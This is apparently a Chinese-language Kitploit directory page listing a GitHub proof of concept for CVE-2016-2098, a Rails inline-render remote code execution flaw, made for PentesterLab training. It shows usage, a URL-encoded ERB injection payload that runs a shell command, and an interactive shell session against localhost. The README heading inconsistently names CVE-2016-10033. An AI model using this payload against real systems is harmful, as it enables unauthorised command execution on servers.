Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2016-2098-PoC — 我为PentesterLab制作的CVE-2016-2098 PoC | Kitploit
工具/GitHubGitHub/sealldeveloper/cve-2016-2098-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubsealldeveloper/cve-2016-2098-poc

CVE-2016-2098-PoC

我为PentesterLab制作的CVE-2016-2098 PoC

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2016-10033-PoC

这是为 PentesterLab 编写的

如果你是来自 PentesterLab,请不要作弊,自己学习会好得多。

希望它对某人有帮助,即使不是对未来的我 :)

包含交互式 shell,还有很好的 argparse 功能。

用法

root@kitploit:~
usage: script.py [-h] --url URL [--param PARAM] [--proxy] [--raw] [--no-color]
script.py: error: the following arguments are required: --url

示例

root@kitploit:~
$ python3 script.py --url "http://localhost:8000/pages?id=test"
[+] No parameter specified. Available parameters: ['id']
[+] Testing parameter: id
[+] Testing injection with URL: http://localhost:8000/pages?id[inline]=%3C%25%3D%20%25x%28echo%20SEALLDEV_OUTPUT_%24%28id%29%29%20%25%3E
[+] Injection successful! Test output: uid=1000(webrick) gid=1000(webrick) groups=1000(webrick)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
webrick
下载工具